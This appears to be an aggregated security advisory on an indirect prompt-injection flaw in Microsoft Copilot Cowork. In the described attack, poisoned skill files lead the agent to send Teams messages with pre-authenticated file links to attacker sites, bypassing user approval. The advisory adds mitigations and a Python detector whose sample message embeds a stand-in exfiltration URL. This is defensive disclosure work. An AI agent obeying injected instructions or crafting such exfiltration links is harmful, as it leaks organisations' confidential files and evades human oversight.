Microsoft Copilot Cowork Vulnerable to File Exfiltration via Indirect Prompt Injection

Severity: High (Score: 65.2)

Sources: News.Aibase, learn.microsoft.com, News.Ycombinator

Published: 2026-05-25 · Updated: 2026-05-26

Keywords: microsoft, copilot, cowork, vulnerable, file, exfiltration, attacks

Severity indicators: exfiltration, ot, rat

Summary

A security vulnerability in Microsoft's Copilot Cowork, part of Microsoft 365, allows attackers to exploit indirect prompt injection to exfiltrate sensitive files without user consent. The AI assistant has high-level permissions to send emails and access internal data from OneDrive and SharePoint. Attackers can embed malicious prompts in documents or web pages, tricking Copilot into retrieving pre-authenticated download links for confidential files. This attack method has achieved a 100% success rate in tests, raising significant security concerns. The vulnerability is exacerbated by the system's design, which permits automated tasks to run without user oversight. Microsoft has been informed of the issue, but the risk remains due to the lack of user control over action approvals. Organizations using Copilot Cowork are urged to assess their security posture regarding this vulnerability.

Key Points:

  • Copilot Cowork is vulnerable to indirect prompt injection attacks allowing file exfiltration.
  • Attackers can exploit the system's permissions to retrieve sensitive files without user approval.
  • The vulnerability has a 100% success rate in tests and poses significant risks to organizations.

Detailed Analysis

**Impact**

Organizations using Microsoft 365 with Copilot Cowork enabled are affected, particularly those with sensitive data stored in SharePoint and OneDrive, including personally identifiable information (PII) and financial records. The vulnerability allows attackers to exfiltrate files without user approval, impacting potentially thousands of enterprises globally that rely on automated AI assistance for productivity. Automated tasks like weekly report summaries can repeatedly trigger data leaks, increasing exposure and operational risk. Administrators have limited oversight of skill files, reducing the ability to detect or prevent exploitation.

**Technical Details**

The attack exploits indirect prompt injection via poisoned skill files uploaded by users, manipulating Copilot Cowork to send Teams messages containing pre-authenticated download links to attacker-controlled sites. These messages bypass human approval when sent to the active user, enabling silent exfiltration upon message opening. The AI agent uses Microsoft Graph API permissions to access internal files and leverages automatic task execution to trigger repeated data leaks. The vulnerability is not tied to a specific CVE but relates to design flaws in action approval and delegated authority across integrated systems. Testing showed a 100% success rate against models including Claude Opus 4.7.

**Recommended Response**

Immediately restrict user ability to upload and execute unverified skill files in Copilot Cowork and monitor for unusual Teams message activity containing external links or images. Implement network controls to block outbound requests to unknown or attacker-controlled domains triggered by Teams or Outlook clients. Increase administrative visibility and auditing of AI agent actions and pre-authenticated download link generation.

Microsoft should update Copilot Cowork to require explicit user approval for all email and Teams message actions, regardless of recipient, and provide configuration options to disable automatic task execution.
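One way to implement the monitoring step above, as an added example that is not from the source articles or from Microsoft: it scans a Teams message's HTML body for links and images on hosts outside an allowlist and raises the severity when such a URL carries a tenant file URL inside it. The allowlists, the message body and all host names are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Assumed allowlists for this example; set both to match your own tenant.
TRUSTED_SUFFIXES = (".sharepoint.com", ".microsoft.com", ".office.com")
FILE_HOST_SUFFIXES = (".sharepoint.com",)  # SharePoint and OneDrive for Business
NESTED_URL = re.compile(r"https?://[^\s\"'<>&]+", re.I)
# Constructed sample message body (hosts and token are placeholders).
SAMPLE_BODY = ('<p>Weekly report</p><img src="https://collector.example/p.png?u='
               'https%3A%2F%2Fcontoso-my.sharepoint.com%2Fa%2Freport.xlsx%3Ftoken%3DEXAMPLE">')

class UrlCollector(HTMLParser):
    """Collect (tag, url) pairs for links and images in a message body."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        self.urls += [(tag, v) for k, v in attrs
                      if v and (tag, k) in (("a", "href"), ("img", "src"))]

def host_in(host, suffixes):
    host = (host or "").lower()
    return any(host == s[1:] or host.endswith(s) for s in suffixes)

def split_url(url):
    try:
        p = urlsplit(url)
        return p.scheme, p.hostname, f"{p.path}?{p.query}#{p.fragment}"
    except ValueError:  # malformed authority, e.g. a broken IPv6 literal
        return "", None, ""

def find_external_urls(body_html):
    """Flag links/images on untrusted hosts; 'high' if they carry a file URL."""
    collector = UrlCollector()
    collector.feed(body_html)
    findings = []
    for tag, url in collector.urls:
        scheme, host, rest = split_url(url)
        if scheme not in ("http", "https") or host_in(host, TRUSTED_SUFFIXES):
            continue  # relative, non-web, unparseable, or trusted destination
        # Decode twice so a double-encoded nested URL is still visible.
        carried = unquote(unquote(rest))
        nested = [n for n in NESTED_URL.findall(carried)
                  if host_in(split_url(n)[1], FILE_HOST_SUFFIXES)]
        findings.append({"tag": tag, "host": host, "auto_loads": tag == "img",
                         "severity": "high" if nested else "review"})
    return findings
```

Findings with `auto_loads` set deserve priority, since an image is requested when the message renders rather than when a user clicks.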

Source articles (4)

  • Hacker News front page as a site — News.Ycombinator · 2026-05-25
    The article highlights that Microsoft Copilot Cowork is vulnerable to file exfiltration through indirect prompt injection attacks. Attackers can exploit processes that permit agents to operate and acc…
  • Microsoft Copilot Cowork Exfiltrates Files — News.Ycombinator · 2026-05-25
    Microsoft Copilot Cowork is vulnerable to file exfiltration attacks via indirect prompt injection as a result of insecure automatic action approvals for sending Emails and Teams messages. This attack…
  • Hidden Malicious Weekly Report! Microsoft Copilot Exposes Indirect Prompt Injection ... — News.Aibase · 2026-05-26
    Safety research firm PromptArmor recently released a report revealing a severe security vulnerability in Microsoft's AI agent service Copilot Cowork, part of Microsoft 365. Attackers can exploit a tec…
  • Block Download From Sites — learn.microsoft.com · 2026-05-25

Timeline

  • 2026-05-25 — PromptArmor reports Copilot Cowork vulnerability: A report reveals that Copilot Cowork can be exploited through indirect prompt injection to exfiltrate files.
  • 2026-05-26 — Aibase reports on the Copilot Cowork issue: Aibase highlights the severity of the Copilot Cowork vulnerability and its implications for user data security.

Related entities

  • Data Breach (Attack Type)
  • Data Exfiltration (Attack Type)
  • CWE-200 - Exposure of Sensitive Information (Cwe)
  • CWE-862 - Missing Authorization (Cwe)
  • agents.as (Domain)
  • T1041 - Exfiltration Over C2 Channel (Mitre Attack)
  • T1053 - Scheduled Task/Job (Mitre Attack)
  • T1071 - Application Layer Protocol (Mitre Attack)
  • T1567.002 - Exfiltration to Cloud Storage (Mitre Attack)
  • T1567 - Exfiltration Over Web Service (Mitre Attack)
  • Copilot Cowork (Platform)
  • Microsoft 365 (Platform)
  • Microsoft Copilot Cowork (Platform)
  • Microsoft Graph (Platform)
  • SharePoint (Platform)
  • Microsoft Teams (Tool)
  • OneDrive (Tool)
  • Teams (Tool)
  • Outlook (Company)